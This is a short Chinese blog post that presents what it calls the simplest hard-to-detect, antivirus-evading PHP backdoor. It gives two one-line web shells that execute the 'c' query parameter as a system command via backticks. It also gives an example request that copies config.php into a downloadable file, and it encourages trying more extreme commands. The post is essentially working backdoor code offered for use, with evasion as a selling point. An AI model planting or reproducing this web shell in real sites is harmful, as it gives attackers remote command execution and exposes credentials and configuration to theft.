PHP最简单的后门,且难查,不报毒!

原创
2015/09/08 10:09
阅读数 1.6K

直接上代码:

<?php

$c=urldecode($_GET['c']);if($c){`$c`;}//完整

!$_GET['c']||`{$_GET['c']}`;//精简

/*******************************************************
 * 原理:PHP中``符号包含会当作系统命令执行
 * 示例:http://host/?c=type%20config.php>config.txt
 *       然后就可以下载config.txt查看内容了!
 *       可以试试更变态的命令,不要干坏事哦!
 *******************************************************/


其实现原理就是PHP会直接将 ` 符号(注意:不是单引号)包含的内容解析为系统命令执行!这样就可以自由变态地扩展了!

转载请尊重原创,OK?

展开阅读全文
加载中

作者的其它热门文章

打赏
2
17 收藏
分享
打赏
0 评论
17 收藏
2
分享
返回顶部
顶部